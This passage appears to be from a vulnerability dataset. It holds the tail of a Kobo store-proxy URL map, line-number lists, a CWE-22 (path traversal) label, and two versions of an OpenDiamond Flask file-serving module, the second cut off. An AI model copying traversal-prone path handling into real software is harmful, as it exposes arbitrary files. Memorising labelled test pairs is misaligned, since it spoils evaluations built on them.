    section of Kobo's own init response, so the device keeps working
    against the official store for everything this proxy does not serve.
    """
    return {
        "account_page": "https://secure.kobobooks.com/profile",
        "account_page_rakuten": "https://my.rakuten.co.jp/",
        "add_entitlement": "https://storeapi.kobo.com/v1/library/{RevisionIds}",
        "affiliaterequest": "https://storeapi.kobo.com/v1/affiliate",
        "audiobook_subscription_orange_deal_inclusion_url": "https://authorize.kobo.com/inclusion",
        "authorproduct_recommendations": "https://storeapi.kobo.com/v1/products/VAR_65/authors/recommendations",
        "autocomplete": "https://storeapi.kobo.com/v1/products/autocomplete",
        "blackstone_header": {"key": "x-amz-request-payer", "value": "requester"},
        "book": "https://storeapi.kobo.com/v1/products/VAR_65/{ProductId}",
        "book_detail_page": "https://store.kobobooks.com/{culture}/ebook/{slug}",
        "book_detail_page_rakuten": "https://VAR_65.rakuten.co.jp/rk/{crossrevisionid}",
        "book_landing_page": "https://store.kobobooks.com/ebooks",
        "book_subscription": "https://storeapi.kobo.com/v1/products/VAR_65/subscriptions",
        "categories": "https://storeapi.kobo.com/v1/categories",
        "categories_page": "https://store.kobobooks.com/ebooks/categories",
        "category": "https://storeapi.kobo.com/v1/categories/{CategoryId}",
        "category_featured_lists": "https://storeapi.kobo.com/v1/categories/{CategoryId}/featured",
        "category_products": "https://storeapi.kobo.com/v1/categories/{CategoryId}/products",
        "checkout_borrowed_book": "https://storeapi.kobo.com/v1/library/borrow",
        "configuration_data": "https://storeapi.kobo.com/v1/configuration",
        "content_access_book": "https://storeapi.kobo.com/v1/products/VAR_65/{ProductId}/access",
        "customer_care_live_chat": "https://v2.zopim.com/widget/livechat.html?key=Y6gwUmnu4OATxN3Tli4Av9bYN319BTdO",
        "daily_deal": "https://storeapi.kobo.com/v1/products/dailydeal",
        "deals": "https://storeapi.kobo.com/v1/deals",
        "delete_entitlement": "https://storeapi.kobo.com/v1/library/{Ids}",
        "delete_tag": "https://storeapi.kobo.com/v1/library/tags/{TagId}",
        "delete_tag_items": "https://storeapi.kobo.com/v1/library/tags/{TagId}/VAR_16/delete",
        "device_auth": "https://storeapi.kobo.com/v1/auth/device",
        "device_refresh": "https://storeapi.kobo.com/v1/auth/refresh",
        "dictionary_host": "https://kbdownload1-a.akamaihd.net",
        "discovery_host": "https://discovery.kobobooks.com",
        "eula_page": "https://www.kobo.com/termsofuse?style=onestore",
        "exchange_auth": "https://storeapi.kobo.com/v1/auth/exchange",
        "external_book": "https://storeapi.kobo.com/v1/products/VAR_65/external/{Ids}",
        "facebook_sso_page": "https://authorize.kobo.com/signin/provider/Facebook/login?returnUrl=http://store.kobobooks.com/",
        "featured_list": "https://storeapi.kobo.com/v1/products/featured/{FeaturedListId}",
        "featured_lists": "https://storeapi.kobo.com/v1/products/featured",
        "free_books_page": {
            "EN": "https://www.kobo.com/{region}/{language}/p/free-ebooks",
            "FR": "https://www.kobo.com/{region}/{language}/p/livres-gratuits",
            "IT": "https://www.kobo.com/{region}/{language}/p/libri-gratuiti",
            "NL": "https://www.kobo.com/{region}/{language}/List/bekijk-het-overzicht-van-gratis-ebooks/QpkkVWnUw8sxmgjSlCbJRg",
            "PT": "https://www.kobo.com/{region}/{language}/p/livros-gratis",
        },
        "fte_feedback": "https://storeapi.kobo.com/v1/products/ftefeedback",
        "get_tests_request": "https://storeapi.kobo.com/v1/analytics/gettests",
        "giftcard_epd_redeem_url": "https://www.kobo.com/{storefront}/{language}/redeem-ereader",
        "giftcard_redeem_url": "https://www.kobo.com/{storefront}/{language}/redeem",
        "help_page": "https://www.kobo.com/help",
        "kobo_audiobooks_enabled": "False",
        "kobo_audiobooks_orange_deal_enabled": "False",
        "kobo_audiobooks_subscriptions_enabled": "False",
        "kobo_nativeborrow_enabled": "True",
        "kobo_onestorelibrary_enabled": "False",
        "kobo_redeem_enabled": "True",
        "kobo_shelfie_enabled": "False",
        "kobo_subscriptions_enabled": "False",
        "kobo_superpoints_enabled": "False",
        "kobo_wishlist_enabled": "True",
        "library_book": "https://storeapi.kobo.com/v1/user/library/VAR_65/{LibraryItemId}",
        "library_items": "https://storeapi.kobo.com/v1/user/library",
        "library_metadata": "https://storeapi.kobo.com/v1/library/{Ids}/metadata",
        "library_prices": "https://storeapi.kobo.com/v1/user/library/previews/prices",
        "library_stack": "https://storeapi.kobo.com/v1/user/library/stacks/{LibraryItemId}",
        "library_sync": "https://storeapi.kobo.com/v1/library/sync",
        "love_dashboard_page": "https://store.kobobooks.com/{culture}/kobosuperpoints",
        "love_points_redemption_page": "https://store.kobobooks.com/{culture}/KoboSuperPointsRedemption?productId={ProductId}",
        "magazine_landing_page": "https://store.kobobooks.com/emagazines",
        "notifications_registration_issue": "https://storeapi.kobo.com/v1/notifications/registration",
        "oauth_host": "https://oauth.kobo.com",
        "overdrive_account": "https://auth.overdrive.com/account",
        "overdrive_library": "https://{libraryKey}.auth.overdrive.com/library",
        "overdrive_library_finder_host": "https://libraryfinder.api.overdrive.com",
        "overdrive_thunder_host": "https://thunder.api.overdrive.com",
        "password_retrieval_page": "https://www.kobobooks.com/passwordretrieval.html",
        "post_analytics_event": "https://storeapi.kobo.com/v1/analytics/event",
        "privacy_page": "https://www.kobo.com/privacypolicy?style=onestore",
        "product_nextread": "https://storeapi.kobo.com/v1/products/{ProductIds}/nextread",
        "product_prices": "https://storeapi.kobo.com/v1/products/{ProductIds}/prices",
        "product_recommendations": "https://storeapi.kobo.com/v1/products/{ProductId}/recommendations",
        "product_reviews": "https://storeapi.kobo.com/v1/products/{ProductIds}/reviews",
        "products": "https://storeapi.kobo.com/v1/products",
        "provider_external_sign_in_page": "https://authorize.kobo.com/ExternalSignIn/{providerName}?returnUrl=http://store.kobobooks.com/",
        "purchase_buy": "https://www.kobo.com/checkout/createpurchase/",
        "purchase_buy_templated": "https://www.kobo.com/{culture}/checkout/createpurchase/{ProductId}",
        "quickbuy_checkout": "https://storeapi.kobo.com/v1/store/quickbuy/{PurchaseId}/checkout",
        "quickbuy_create": "https://storeapi.kobo.com/v1/store/quickbuy/purchase",
        "rating": "https://storeapi.kobo.com/v1/products/{ProductId}/rating/{Rating}",
        "reading_state": "https://storeapi.kobo.com/v1/library/{Ids}/state",
        "redeem_interstitial_page": "https://store.kobobooks.com",
        "registration_page": "https://authorize.kobo.com/signup?returnUrl=http://store.kobobooks.com/",
        "related_items": "https://storeapi.kobo.com/v1/products/{Id}/related",
        "remaining_book_series": "https://storeapi.kobo.com/v1/products/VAR_65/series/{SeriesId}",
        "rename_tag": "https://storeapi.kobo.com/v1/library/tags/{TagId}",
        "review": "https://storeapi.kobo.com/v1/products/reviews/{ReviewId}",
        "review_sentiment": "https://storeapi.kobo.com/v1/products/reviews/{ReviewId}/sentiment/{Sentiment}",
        "shelfie_recommendations": "https://storeapi.kobo.com/v1/user/recommendations/shelfie",
        "sign_in_page": "https://authorize.kobo.com/signin?returnUrl=http://store.kobobooks.com/",
        "social_authorization_host": "https://social.kobobooks.com:8443",
        "social_host": "https://social.kobobooks.com",
        "stacks_host_productId": "https://store.kobobooks.com/collections/byproductid/",
        "store_home": "www.kobo.com/{region}/{language}",
        "store_host": "store.kobobooks.com",
        "store_newreleases": "https://store.kobobooks.com/{culture}/List/new-releases/961XUjtsU0qxkFItWOutGA",
        "store_search": "https://store.kobobooks.com/{culture}/Search?Query={query}",
        "store_top50": "https://store.kobobooks.com/{culture}/ebooks/Top",
        "tag_items": "https://storeapi.kobo.com/v1/library/tags/{TagId}/Items",
        "tags": "https://storeapi.kobo.com/v1/library/tags",
        "taste_profile": "https://storeapi.kobo.com/v1/products/tasteprofile",
        "update_accessibility_to_preview": "https://storeapi.kobo.com/v1/library/{EntitlementIds}/preview",
        "use_one_store": "False",
        "user_loyalty_benefits": "https://storeapi.kobo.com/v1/user/loyalty/benefits",
        "user_platform": "https://storeapi.kobo.com/v1/user/platform",
        "user_profile": "https://storeapi.kobo.com/v1/user/profile",
        "user_ratings": "https://storeapi.kobo.com/v1/user/ratings",
        "user_recommendations": "https://storeapi.kobo.com/v1/user/recommendations",
        "user_reviews": "https://storeapi.kobo.com/v1/user/reviews",
        "user_wishlist": "https://storeapi.kobo.com/v1/user/wishlist",
        "userguide_host": "https://kbdownload1-a.akamaihd.net",
        "wishlist_page": "https://store.kobobooks.com/{region}/{language}/account/wishlist",
    }
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
26,
31,
49,
56,
60,
62,
66,
68,
69,
71,
77,
78,
85,
86,
89,
90,
96,
106,
107,
113,
115,
119,
125,
126,
133,
134,
144,
145,
146,
147,
153,
154,
155,
157,
159,
176,
177,
206,
207,
208,
209,
220,
226,
231,
233,
238,
243,
253,
255,
264,
266,
268,
269,
274,
276,
277,
279,
281,
295,
299,
309,
311,
316,
317,
319,
320,
324,
327,
334,
340,
341,
343,
345,
346,
358,
361,
362,
369,
385,
386,
403,
404,
407,
408,
413,
414,
415,
427,
428,
433,
434,
439,
442,
443,
447,
452,
458,
460,
463,
467,
483,
484,
492,
502,
505,
507,
508,
511,
513,
526,
531,
535,
541,
542,
554,
557,
568,
573,
574,
575,
584,
589,
596,
597,
608,
614,
617,
621,
625,
626,
637,
644,
647,
654,
659,
664,
667,
669,
670,
671,
672,
675,
689,
706,
721,
722,
726,
728,
732,
743,
744,
745,
767,
768,
776,
778,
783,
787,
799,
806,
821,
828,
829,
838,
839,
848,
858,
859,
873,
874,
880,
886,
887,
897,
898,
908,
909,
925,
942,
946,
947,
951,
952,
961,
972,
976,
977,
978,
983,
984,
985,
994,
995,
1008,
1009,
1011,
1012,
1027,
1028,
1039,
1040,
1045,
1057,
1103,
1106,
1108,
1109,
1115,
1116,
1240
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
26,
31,
49,
50,
57,
61,
63,
67,
69,
70,
72,
78,
79,
86,
87,
90,
91,
97,
107,
108,
114,
116,
120,
126,
127,
134,
135,
145,
146,
147,
148,
154,
155,
156,
158,
160,
177,
178,
207,
208,
209,
210,
221,
227,
232,
234,
239,
244,
254,
256,
265,
267,
269,
270,
275,
277,
278,
280,
282,
296,
300,
310,
312,
317,
318,
320,
321,
325,
328,
335,
341,
342,
344,
346,
347,
359,
362,
363,
370,
386,
387,
404,
405,
408,
409,
414,
415,
416,
428,
429,
434,
435,
440,
443,
444,
448,
453,
459,
461,
464,
468,
484,
485,
493,
503,
506,
508,
512,
514,
527,
532,
536,
542,
543,
555,
558,
569,
574,
575,
576,
585,
590,
597,
598,
610,
616,
619,
623,
627,
628,
640,
647,
650,
657,
662,
667,
670,
672,
673,
674,
675,
678,
692,
709,
724,
725,
729,
731,
735,
746,
747,
748,
770,
771,
779,
781,
786,
790,
802,
809,
824,
831,
832,
841,
842,
851,
861,
862,
876,
877,
883,
889,
890,
900,
901,
911,
912,
928,
945,
949,
950,
954,
955,
964,
975,
979,
980,
981,
986,
987,
988,
998,
999,
1013,
1014,
1016,
1017,
1032,
1033,
1045,
1046,
1051,
1063,
1109,
1112,
1114,
1115,
1121,
1122,
1246
] |
0CWE-22
| #
# The OpenDiamond Platform for Interactive Search
#
# Copyright (c) 2009-2018 Carnegie Mellon University
# All rights reserved.
#
# This software is distributed under the terms of the Eclipse Public
# License, Version 1.0 which can be found in the file named LICENSE.
# ANY USE, REPRODUCTION OR DISTRIBUTION OF THIS SOFTWARE CONSTITUTES
# RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT
#
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from opendiamond.dataretriever.test_utils import *
BASEURL = 'cocktailtest'
STYLE = False
LOCAL_OBJ_URI = True # if true, return local file path, otherwise http.
INDEXDIR = DATAROOT = None
ITEMS_PER_ITERATION = int(1e4)
"""
Example cocktail url:
/cocktail/base/FFFFFFFFFFFFFFFF/distrbuted/1of2/ \
mixers/FFFFFFFFFFFFFFFC/keywords/d_42_1.0/classes/gull,cardinal
/cocktail/base/"0"/mixers/FFFFFFFFFFFFFFFC/keywords/d_42_1.0
/cocktail/base/FFFFFFFFFFFFFFFF/keywords/d_42_1.0
"""
def init(config):
    """Record the configured data root; the stream index dir is fixed."""
    global INDEXDIR, DATAROOT  # pylint: disable=global-statement
    DATAROOT = config.dataroot
    INDEXDIR = '/srv/diamond/STREAM'
scope_blueprint = Blueprint('test_store', __name__)
_log = logging.getLogger(__name__)
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>/' +
                       'classes/<classes>')
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>/' +
                       'classes/<classes>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/base/<baseidx>/distrbuted/<int:index>of<int:total>/' +
                       'mixers/<mixeridx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/distrbuted/<int:index>of<int:total>/' +
                       'mixers/<mixeridx>/keywords/<params>/classes/<classes>')
def get_mixer_classes(baseidx, mixeridx=None, index=1, total=1, params=None,
                      classes=None, start=0, limit=-1):
    """Scope endpoint that mixes a base index with a slice of a mixer set.

    For distributed requests (/distrbuted/<index>of<total>) this server
    takes only its share of the mixer list; otherwise the whole list is
    used. Streaming of the combined list is delegated to get_scope().
    """
    mixer_list = get_mixer_list(mixeridx, classes)
    # index is 1-based: server i of n takes slice [(i-1)/n, i/n) of the list.
    start_idx = int((index-1)*(1.0/total)*len(mixer_list))
    end_idx = int(index*(1.0/total)*len(mixer_list))
    mixer_list = mixer_list[start_idx:end_idx]
    _log.info("Mixer Size {}".format(len(mixer_list)))
    sys.stdout.flush()
    return get_scope(baseidx, params, mixer_list, start, limit)
@scope_blueprint.route('/base/<baseidx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/keywords/<params>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/base/<baseidx>/start/<int:start>/limit/<int:limit>')
def get_scope(baseidx, params=None, mixer_list=None, start=0, limit=-1):
    """Stream an XML <objectlist> for the requested scope.

    baseidx "0" means no base index: the mixer list alone is served.
    Otherwise a base file named <type>_<seed>_<posfile>_<rate> is read
    (created on demand by split_data) and optionally start/limit sliced.
    When both a base list and a mixer list are present ("cocktail" mode),
    int(percentage * total) mixer entries are interleaved at positions
    chosen by a seeded RNG, so the stream is reproducible per seed.
    """
    _log.info("Enter Scope baseIdx {}".format(baseidx))
    sys.stdout.flush()
    base_list = []
    seed = None
    percentage = 0.
    if params:
        seed, percentage = decode_params(params)
    # s_seed: concrete seed used to pick/build the base split file, even
    # when the request asked for a random one (seed is None).
    s_seed = seed
    if s_seed == None:
        s_seed = random.randrange(10000)
    if baseidx != "0":
        # format of baseidx: stream_inat
        # format of base file: stream_{int: seed}_{float(.2f): baserate}
        base_index = _get_index_absolute_path(baseidx)
        data_type, pos_file = base_index.split('_')
        # index[-1] = str("{:.2f}".format(index[-1])) # to ensure there is exactly two decial places
        # if seed != s_seed:
        #     index[1] = str(s_seed)
        # base_index = '_'.join(index)
        base_list = [data_type, str(s_seed), pos_file, "{:.2f}".format(percentage)]
        base_index = '_'.join(base_list)
        print(base_index)
        if not os.path.exists(base_index):
            split_data(INDEXDIR, percentage, s_seed)
        #base_index = base_index.replace(str(seed),str(s_seed))
        with open(base_index, 'r') as f:
            base_list = list(f.readlines())
        if start > 0:
            base_list = base_list[start:]
        if limit > 0:
            end_ = len(base_list)
            if limit > end_:
                limit = end_
            base_list = base_list[:limit]
    total_entries = len(base_list)
    make_cocktail = bool(mixer_list and base_list)
    if base_list:
        total_entries = len(base_list) #base_entries
    else:
        # No base: serve the mixer list itself as the base stream.
        total_entries = len(mixer_list)
        base_list = mixer_list.copy()
        del mixer_list
    random.seed(seed)
    #random.Random(seed).shuffle(base_list)
    total_sample = 0
    if make_cocktail:
        random.Random(seed).shuffle(mixer_list)
        total_sample = int(percentage*total_entries)
        total_entries = total_entries + total_sample
    # Streaming response:
    # http://flask.pocoo.org/docs/0.12/patterns/streaming/
    def generate():
        yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
        if STYLE:
            yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
        yield '<objectlist count="{:d}">\n'.format(total_entries)
        mix_per_iteration = 0
        iteration_count = 0
        if make_cocktail:
            mix_per_iteration = int(percentage * ITEMS_PER_ITERATION)
            pool = cycle(mixer_list)
        mix_indices = []
        def generate_mix_indices():
            # Seeded sample of positions within the current 10k chunk that
            # will be filled from the mixer pool (offset into the stream).
            random.seed(seed)
            return list(map(lambda x: x + ITEMS_PER_ITERATION*iteration_count,
                            sorted(random.sample(list(range(ITEMS_PER_ITERATION)), mix_per_iteration))))
        for count in range(total_entries):
            # Refresh the mix positions at the start of every 10k chunk.
            if not count % ITEMS_PER_ITERATION and make_cocktail:
                mix_indices = generate_mix_indices()
                iteration_count += 1
            if count in mix_indices:
                obj_path = next(pool).strip()
            else:
                obj_path = base_list.pop(0).strip()
            yield _get_object_element(object_path=obj_path) + '\n'
        yield '</objectlist>\n'
    headers = Headers([('Content-Type', 'text/xml')])
    return Response(stream_with_context(generate()),
                    status="200 OK",
                    headers=headers)
def decode_params(params):
    """Decode a "<type>_<seed>[_<rate>]" keyword spec into (seed, rate).

    A type of 'r' requests random seeding, so None is returned for the
    seed. The mix rate defaults to 0.1 when absent and is rounded to
    four decimal places.
    """
    fields = params.split('_')
    seed = int(fields[1])  # always parsed, even when random mode discards it
    if fields[0] == 'r':
        seed = None
    rate = float(fields[2]) if len(fields) > 2 else 0.1
    return seed, round(rate, 4)
def get_mixer_list(idx, classes=None):
    """
    Return list of file paths present in given classes of mixer set
    If class list is None or incorrect then return list of entire mixer set.
    Args:
        classes (str): Comma seperated classes of interest
        idx (str): Index of mixer collection
    Returns:
        list of object paths (relative to DATAROOT) for the selected
        classes, or the raw index lines when no class directory matches
    """
    mixer_index = _get_index_absolute_path('GIDIDX' + idx.upper())
    # FIX: the last pattern was '.png', which only matches a file literally
    # named ".png"; '*.png' matches actual PNG objects.
    image_types = ('*.jpg', '*.JPG', '*.jpeg', '*.png')
    classes_list = []
    if classes:
        # FIX: str.replace returns a new string — the original discarded the
        # result, so URL-encoded ',' and ' ' were never actually decoded.
        classes = classes.replace('%2C', ',').replace('%20', ' ')
        classes_list = classes.split(',')

    def get_class_path():
        # The first index line locates the dataset; class directories sit
        # two levels above the indexed objects.
        with open(mixer_index, 'r') as f:
            dataset_path = f.readline()
        dataset_path = '/'.join(dataset_path.split('/')[:-2])
        class_paths = []
        for c in classes_list:
            class_paths.append(_get_obj_absolute_path(dataset_path + '/' + c.strip()))
        return class_paths

    mixer_list = []
    class_paths = get_class_path()
    _log.info("Class paths : {}".format(class_paths))
    if class_paths:
        for path in class_paths:
            _log.info("Path Exists ? {}".format(os.path.exists(path)))
            sys.stdout.flush()
            file_list = []
            for ext in image_types:
                file_list.extend(glob.glob(os.path.join(path, ext)))
            mixer_list.extend(sorted(file_list))
        mixer_list = [_get_obj_path(l.strip()) for l in mixer_list]
    else:
        # No class filter (or none matched): serve the whole mixer index.
        with open(mixer_index, 'r') as f:
            mixer_list = list(f.readlines())
    return mixer_list
@scope_blueprint.route('/id/<path:object_path>')
def get_object_id(object_path):
    """Serve the <object .../> XML element for a single object."""
    xml = _get_object_element(object_path=object_path)
    return Response(xml, "200 OK",
                    headers=Headers([('Content-Type', 'text/xml')]))
@scope_blueprint.route('/meta/<path:object_path>')
def get_object_meta(object_path):
    """Return JSON metadata for an object (its ground-truth label)."""
    abs_path = _get_obj_absolute_path(object_path)
    attrs = {}
    try:
        # The label is the name of the object's parent directory.
        attrs['_gt_label'] = abs_path.split('/')[-2]
    except IOError:
        pass
    return jsonify(attrs)
def _get_object_element(object_path):
    """Build the <object .../> XML element for one object.

    A meta attribute is included only when a classes.txt file exists two
    directory levels above the object (i.e. labels are available).
    """
    abs_path = _get_obj_absolute_path(object_path)
    parts = [
        'id=' + quoteattr(url_for('.get_object_id', object_path=object_path)),
        'src=' + quoteattr(_get_object_src_uri(object_path)),
    ]
    labels_file = '/'.join(abs_path.split('/')[:-2]) + '/classes.txt'
    if os.path.isfile(labels_file):
        parts.append('meta=' + quoteattr(url_for('.get_object_meta',
                                                 object_path=object_path)))
    return '<object {} />'.format(' '.join(parts))
def _get_object_src_uri(object_path):
    """Return the object's content URI: file:// when serving locally,
    otherwise an HTTP URL routed through this blueprint."""
    if not LOCAL_OBJ_URI:
        return url_for('.get_object_src_http', obj_path=object_path)
    return 'file://' + _get_obj_absolute_path(object_path)
def _get_obj_path(obj_path):
    """Return obj_path relative to DATAROOT.

    FIX: the original used str.replace, which strips EVERY occurrence of
    the DATAROOT string anywhere in the path, not just a leading one;
    only the prefix is removed now.
    """
    prefix = DATAROOT + '/'
    if obj_path.startswith(prefix):
        return obj_path[len(prefix):]
    return obj_path
def _get_obj_absolute_path(obj_path):
    """Resolve obj_path inside DATAROOT, rejecting directory traversal.

    obj_path comes straight from request URLs, so the unchecked
    os.path.join of the original allowed '..' (or an absolute path) to
    escape DATAROOT and read arbitrary files (CWE-22).

    Raises:
        ValueError: if the resolved path would leave DATAROOT.
    """
    base = os.path.abspath(DATAROOT)
    resolved = os.path.normpath(os.path.join(base, obj_path))
    if resolved != base and not resolved.startswith(base + os.sep):
        raise ValueError('object path escapes data root: %r' % obj_path)
    return resolved
def _get_index_absolute_path(index):
    """Resolve an index name inside INDEXDIR, rejecting directory traversal.

    index is attacker-controllable via the scope URLs, so the unchecked
    os.path.join of the original allowed '..' to escape INDEXDIR (CWE-22).

    Raises:
        ValueError: if the resolved path would leave INDEXDIR.
    """
    base = os.path.abspath(INDEXDIR)
    resolved = os.path.normpath(os.path.join(base, index))
    if resolved != base and not resolved.startswith(base + os.sep):
        raise ValueError('index path escapes index dir: %r' % index)
    return resolved
@scope_blueprint.route('/obj/<path:obj_path>')
def get_object_src_http(obj_path):
    """Stream the raw object bytes over HTTP with year-long caching."""
    one_year = datetime.timedelta(days=365).total_seconds()
    # add_etags/conditional let Flask answer 304 Not Modified on its own.
    response = send_file(_get_obj_absolute_path(obj_path),
                         cache_timeout=one_year,
                         add_etags=True,
                         conditional=True)
    response.headers.extend(Headers())
    return response
| #
# The OpenDiamond Platform for Interactive Search
#
# Copyright (c) 2009-2018 Carnegie Mellon University
# All rights reserved.
#
# This software is distributed under the terms of the Eclipse Public
# License, Version 1.0 which can be found in the file named LICENSE.
# ANY USE, REPRODUCTION OR DISTRIBUTION OF THIS SOFTWARE CONSTITUTES
# RECIPIENT'S ACCEPTANCE OF THIS AGREEMENT
#
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.security import safe_join
from opendiamond.dataretriever.test_utils import *
BASEURL = 'cocktailtest'
STYLE = False
LOCAL_OBJ_URI = True # if true, return local file path, otherwise http.
INDEXDIR = DATAROOT = None
ITEMS_PER_ITERATION = int(1e4)
"""
Example cocktail url:
/cocktail/base/FFFFFFFFFFFFFFFF/distrbuted/1of2/ \
mixers/FFFFFFFFFFFFFFFC/keywords/d_42_1.0/classes/gull,cardinal
/cocktail/base/"0"/mixers/FFFFFFFFFFFFFFFC/keywords/d_42_1.0
/cocktail/base/FFFFFFFFFFFFFFFF/keywords/d_42_1.0
"""
def init(config):
    """Record the configured data root; the stream index dir is fixed."""
    global INDEXDIR, DATAROOT  # pylint: disable=global-statement
    DATAROOT = config.dataroot
    INDEXDIR = '/srv/diamond/STREAM'
scope_blueprint = Blueprint('test_store', __name__)
_log = logging.getLogger(__name__)
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>/' +
                       'classes/<classes>')
@scope_blueprint.route('/base/<baseidx>/mixers/<mixeridx>/keywords/<params>/' +
                       'classes/<classes>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/base/<baseidx>/distrbuted/<int:index>of<int:total>/' +
                       'mixers/<mixeridx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/distrbuted/<int:index>of<int:total>/' +
                       'mixers/<mixeridx>/keywords/<params>/classes/<classes>')
def get_mixer_classes(baseidx, mixeridx=None, index=1, total=1, params=None,
                      classes=None, start=0, limit=-1):
    """Scope endpoint that mixes a base index with a slice of a mixer set.

    For distributed requests (/distrbuted/<index>of<total>) this server
    takes only its share of the mixer list; otherwise the whole list is
    used. Streaming of the combined list is delegated to get_scope().
    """
    mixer_list = get_mixer_list(mixeridx, classes)
    # index is 1-based: server i of n takes slice [(i-1)/n, i/n) of the list.
    start_idx = int((index-1)*(1.0/total)*len(mixer_list))
    end_idx = int(index*(1.0/total)*len(mixer_list))
    mixer_list = mixer_list[start_idx:end_idx]
    _log.info("Mixer Size {}".format(len(mixer_list)))
    sys.stdout.flush()
    return get_scope(baseidx, params, mixer_list, start, limit)
@scope_blueprint.route('/base/<baseidx>/keywords/<params>')
@scope_blueprint.route('/base/<baseidx>/keywords/<params>/start/<int:start>/limit/<int:limit>')
@scope_blueprint.route('/base/<baseidx>/start/<int:start>/limit/<int:limit>')
def get_scope(baseidx, params=None, mixer_list=None, start=0, limit=-1):
    """Stream an XML <objectlist> for the requested scope.

    baseidx "0" means no base index: the mixer list alone is served.
    Otherwise a base file named <type>_<seed>_<posfile>_<rate> is read
    (created on demand by split_data) and optionally start/limit sliced.
    When both a base list and a mixer list are present ("cocktail" mode),
    int(percentage * total) mixer entries are interleaved at positions
    chosen by a seeded RNG, so the stream is reproducible per seed.
    """
    _log.info("Enter Scope baseIdx {}".format(baseidx))
    sys.stdout.flush()
    base_list = []
    seed = None
    percentage = 0.
    if params:
        seed, percentage = decode_params(params)
    # s_seed: concrete seed used to pick/build the base split file, even
    # when the request asked for a random one (seed is None).
    s_seed = seed
    if s_seed == None:
        s_seed = random.randrange(10000)
    if baseidx != "0":
        # format of baseidx: stream_inat
        # format of base file: stream_{int: seed}_{float(.2f): baserate}
        base_index = _get_index_absolute_path(baseidx)
        data_type, pos_file = base_index.split('_')
        # index[-1] = str("{:.2f}".format(index[-1])) # to ensure there is exactly two decial places
        # if seed != s_seed:
        #     index[1] = str(s_seed)
        # base_index = '_'.join(index)
        base_list = [data_type, str(s_seed), pos_file, "{:.2f}".format(percentage)]
        base_index = '_'.join(base_list)
        print(base_index)
        if not os.path.exists(base_index):
            split_data(INDEXDIR, percentage, s_seed)
        #base_index = base_index.replace(str(seed),str(s_seed))
        with open(base_index, 'r') as f:
            base_list = list(f.readlines())
        if start > 0:
            base_list = base_list[start:]
        if limit > 0:
            end_ = len(base_list)
            if limit > end_:
                limit = end_
            base_list = base_list[:limit]
    total_entries = len(base_list)
    make_cocktail = bool(mixer_list and base_list)
    if base_list:
        total_entries = len(base_list) #base_entries
    else:
        # No base: serve the mixer list itself as the base stream.
        total_entries = len(mixer_list)
        base_list = mixer_list.copy()
        del mixer_list
    random.seed(seed)
    #random.Random(seed).shuffle(base_list)
    total_sample = 0
    if make_cocktail:
        random.Random(seed).shuffle(mixer_list)
        total_sample = int(percentage*total_entries)
        total_entries = total_entries + total_sample
    # Streaming response:
    # http://flask.pocoo.org/docs/0.12/patterns/streaming/
    def generate():
        yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
        if STYLE:
            yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
        yield '<objectlist count="{:d}">\n'.format(total_entries)
        mix_per_iteration = 0
        iteration_count = 0
        if make_cocktail:
            mix_per_iteration = int(percentage * ITEMS_PER_ITERATION)
            pool = cycle(mixer_list)
        mix_indices = []
        def generate_mix_indices():
            # Seeded sample of positions within the current 10k chunk that
            # will be filled from the mixer pool (offset into the stream).
            random.seed(seed)
            return list(map(lambda x: x + ITEMS_PER_ITERATION*iteration_count,
                            sorted(random.sample(list(range(ITEMS_PER_ITERATION)), mix_per_iteration))))
        for count in range(total_entries):
            # Refresh the mix positions at the start of every 10k chunk.
            if not count % ITEMS_PER_ITERATION and make_cocktail:
                mix_indices = generate_mix_indices()
                iteration_count += 1
            if count in mix_indices:
                obj_path = next(pool).strip()
            else:
                obj_path = base_list.pop(0).strip()
            yield _get_object_element(object_path=obj_path) + '\n'
        yield '</objectlist>\n'
    headers = Headers([('Content-Type', 'text/xml')])
    return Response(stream_with_context(generate()),
                    status="200 OK",
                    headers=headers)
def decode_params(params):
    """Decode a "<type>_<seed>[_<rate>]" keyword spec into (seed, rate).

    A type of 'r' requests random seeding, so None is returned for the
    seed. The mix rate defaults to 0.1 when absent and is rounded to
    four decimal places.
    """
    fields = params.split('_')
    seed = int(fields[1])  # always parsed, even when random mode discards it
    if fields[0] == 'r':
        seed = None
    rate = float(fields[2]) if len(fields) > 2 else 0.1
    return seed, round(rate, 4)
def get_mixer_list(idx, classes=None):
    """
    Return list of file paths present in given classes of mixer set
    If class list is None or incorrect then return list of entire mixer set.
    Args:
        classes (str): Comma seperated classes of interest
        idx (str): Index of mixer collection
    Returns:
        list of object paths (relative to DATAROOT) for the selected
        classes, or the raw index lines when no class directory matches
    """
    mixer_index = _get_index_absolute_path('GIDIDX' + idx.upper())
    # FIX: the last pattern was '.png', which only matches a file literally
    # named ".png"; '*.png' matches actual PNG objects.
    image_types = ('*.jpg', '*.JPG', '*.jpeg', '*.png')
    classes_list = []
    if classes:
